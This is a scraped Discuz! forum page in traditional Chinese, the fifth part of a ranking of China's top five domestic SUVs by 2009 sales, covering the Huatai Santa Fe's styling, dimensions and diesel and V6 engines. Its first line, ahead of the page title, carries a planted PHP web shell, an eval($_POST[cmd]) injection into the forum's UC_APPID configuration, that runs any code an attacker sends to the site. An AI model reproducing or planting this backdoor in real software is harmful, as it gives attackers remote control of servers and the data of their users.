');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 銷量決定排名 2009年國內SUV前五強盤點[5] - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

銷量決定排名 2009年國內SUV前五強盤點[5]

 華泰-聖達菲

  09年國產SUV銷量ON:5

  總銷量(輛):4.11萬

  在外觀設計上,聖達菲也更加大氣和硬朗,由中央進氣口向上延伸開來的稜線,除了讓前臉線條更突出外,也增強了車身整體的肌肉感和立體感,令整個前臉更具張力和氣勢。此外,這款2.0L柴油四驅手豪車型的配置也算不錯,自動空調、後視鏡電熱除霜、真皮座椅、天窗、DVD等舒適性配置比較豐富。

  聖達菲的車身結構和外觀也在傳遞這種越野的豪邁氣質,其車身全長4500mm,寬1845mm,高1730mm,最高207mm的離地間隙保證了其良好的通過性,最大28度的進入角和26度的離去角,在面對一般野外坑窪路面時也不會遇到太大的挑戰。




  配備的2.7升V6全鋁制發動機在發動機轉速達到6000轉/分時輸出的最大功率為131.6千瓦,最大扭矩225牛·米在發動機轉速達4000轉/分時即可提供;而2.0升VGT柴油發動機在4000轉/分時輸出的最大功率為92.6千瓦,最大扭矩290牛·米在2000轉/分時即可獲得。CRDi高壓共軌柴油直噴發動機系統與VGT可變截面渦輪增壓系統,百公里油耗僅為6.3升,並且排放率先達到歐Ⅲ標準。

  雖然消費者可選的柴油型SUV有很多,但其中最具品牌優勢、最有口碑、最受市場認可、也最值得推薦的絕對要數哈弗2.5TCI柴油。哈弗是國內SUV市場響噹噹的領軍品牌,而柴油車型接近其總銷量的50%,去年10月份上市的哈弗2.5TCI,更是憑借絕對技術優勢,在柴油SUV這個市場中引領群雄。

  在前五的排名中,以哈弗和聖達菲為柴油的代表車型,佔了當中的兩甲位置,說明柴油車在國內市場仍然有不小的市場。而本田CR-V與豐田RAV4的熱銷卻好好的給奇駿上了一課,除了口碑,外觀的革新也是消費者注意的重點,在擁有先天優勢的前提下,依然敗下陣來,也給了很多國產同類SUV一些啟示。據悉明年還有不少改款及新款SUV登場,本年度的前五強明年排名會怎樣,只有通過時間來驗證了
返回列表